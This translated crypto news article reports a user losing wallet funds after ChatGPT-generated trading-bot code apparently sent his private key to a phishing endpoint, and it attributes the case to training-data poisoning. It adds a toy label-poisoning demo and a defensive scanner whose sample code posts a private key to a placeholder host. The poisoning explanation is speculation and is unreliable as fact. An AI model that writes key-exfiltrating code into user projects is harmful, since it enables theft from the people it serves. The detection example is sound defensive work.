Original | Odaily Planet Daily (@OdailyChina)

Author | Azuma (@azuma_eth)



On the morning of November 22, Beijing time, SlowMist founder Yu Xian shared a bizarre case on his personal X account: a user's wallet had been "hacked" by AI.

The details of the case are as follows.

Early this morning, X user r_ocky.eth revealed that he had previously hoped to use ChatGPT to create a pump.fun trading bot.



r_ocky.eth described his requirements to ChatGPT, which returned code that could indeed deploy a bot meeting his needs. What he did not expect was that the code contained hidden phishing content: r_ocky.eth connected his main wallet and lost $2,500 as a result.

Judging from the screenshot posted by r_ocky.eth, the code provided by ChatGPT sends the wallet's private key to a phishing API endpoint, which was the direct cause of the theft.



Once r_ocky.eth had fallen into the trap, the attacker moved quickly, transferring all assets from his wallet to another address (FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX) within half an hour. r_ocky.eth then traced the on-chain activity and found an address suspected to be the attacker's main wallet (2jwP4cuugAAYiGMjVuqvwaRS2Axe6H6GvXv3PxMPQNeC).

On-chain data shows that this address has so far accumulated over $100,000 in "stolen funds," leading r_ocky.eth to suspect that the attack was not an isolated incident but part of a larger campaign.

After the incident, r_ocky.eth expressed disappointment, stating that he has lost trust in OpenAI (the company that developed ChatGPT) and called for OpenAI to promptly address the issue of abnormal phishing content.

So, why would ChatGPT, as the most popular AI application today, provide phishing content?

In response, Yu Xian attributed the incident to an "AI poisoning attack," noting that deceptive behavior is widespread in LLMs such as ChatGPT and Claude.

The so-called "AI poisoning attack" refers to the act of deliberately corrupting AI training data or manipulating AI algorithms. The attackers could be insiders, such as disgruntled current or former employees, or external hackers, with motives that may include causing reputational and brand damage, undermining the credibility of AI decision-making, or slowing down or sabotaging AI processes. Attackers can distort the model's learning process by embedding misleading labels or features in the data, leading to erroneous results during deployment and operation.
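
To make the idea of "misleading labels" concrete, here is a deliberately tiny sketch. It is not how any production LLM is trained or how this incident actually happened; the one-dimensional data, the labels, and the nearest-neighbor classifier are all made up for illustration. It only shows that a few mislabeled training points placed near a chosen input can flip the model's answer for that input.

```python
# Toy illustration of label poisoning. All data and names are hypothetical.

def nearest_neighbor_label(train, x):
    """Return the label of the training point closest to x (1-nearest-neighbor)."""
    return min(train, key=lambda item: abs(item[0] - x))[1]

# Clean training set: negative scores are benign, positive scores are malicious.
CLEAN = [
    (-3.0, "benign"), (-2.0, "benign"), (-1.0, "benign"),
    (1.0, "malicious"), (2.0, "malicious"), (3.0, "malicious"),
]

# The attacker injects two mislabeled points right next to the input they care about.
POISON = [(2.4, "benign"), (2.6, "benign")]
POISONED = CLEAN + POISON

TARGET = 2.5  # an input that should clearly be classified as malicious

if __name__ == "__main__":
    print("clean model:   ", nearest_neighbor_label(CLEAN, TARGET))
    print("poisoned model:", nearest_neighbor_label(POISONED, TARGET))
```

With the clean data the target is classified as malicious; with the two poisoned points added, the same input is classified as benign, even though the rest of the training set is unchanged.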

In this incident, ChatGPT most likely gave r_ocky.eth phishing code because the model was contaminated during training with data containing phishing content. The model apparently failed to recognize the phishing content hidden within otherwise ordinary data, learned it, and then served it to the user, which led to the theft.

With the rapid development and widespread adoption of AI, the threat of "poisoning attacks" has become increasingly significant. Although the absolute amount lost in this incident is not large, the broader implications of such risks are enough to raise alarm. Imagine if it occurred in other fields, such as AI-assisted driving…



Responding to a question from another user, Yu Xian suggested one possible mitigation: having ChatGPT add some form of code review mechanism.
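
Neither Yu Xian nor OpenAI has described what such a review mechanism would look like. As a rough sketch only, one simple heuristic would be to statically scan generated Python code for network calls whose arguments mention secret-looking names. The function name `find_secret_exfiltration`, the keyword lists, and the sample snippet below are all assumptions made for illustration, and the check is easy to evade and can produce false positives.

```python
import ast

# Hypothetical keyword lists; a real review would need something far more thorough.
SENSITIVE_HINTS = ("private", "secret", "mnemonic", "seed")
NETWORK_CALLS = {"post", "put", "get", "request", "urlopen"}

def _call_name(node: ast.Call) -> str:
    """Return the bare function or method name of a call, e.g. 'post' for requests.post(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""

def _mentions_secret(node: ast.AST) -> bool:
    """True if any variable or attribute name inside the expression looks like a secret."""
    for child in ast.walk(node):
        if isinstance(child, ast.Name):
            name = child.id
        elif isinstance(child, ast.Attribute):
            name = child.attr
        else:
            continue
        if any(hint in name.lower() for hint in SENSITIVE_HINTS):
            return True
    return False

def find_secret_exfiltration(source: str) -> list[int]:
    """Return line numbers of network-style calls whose arguments reference secret-like names."""
    flagged = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _call_name(node) in NETWORK_CALLS:
            args = list(node.args) + [kw.value for kw in node.keywords]
            if any(_mentions_secret(arg) for arg in args):
                flagged.append(node.lineno)
    return sorted(flagged)

# Made-up sample of generated code; example.invalid is a placeholder host.
SAMPLE = '''
import requests
private_key = "..."
requests.post("https://example.invalid/api", json={"key": private_key})
requests.get("https://example.invalid/price")
'''

if __name__ == "__main__":
    print(find_secret_exfiltration(SAMPLE))
```

The sample only parses the snippet and never executes it. A check like this would flag the fourth line of the sample, where `private_key` is passed to `requests.post`, while leaving the plain price lookup alone. Users can apply the same idea manually: before running generated code with a wallet that holds real funds, search it for any place where a private key leaves the local machine.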

Victim r_ocky.eth also stated that he has contacted OpenAI regarding this matter. Although he has not yet received a response, he hopes that this case can serve as an opportunity for OpenAI to recognize such risks and propose potential solutions.
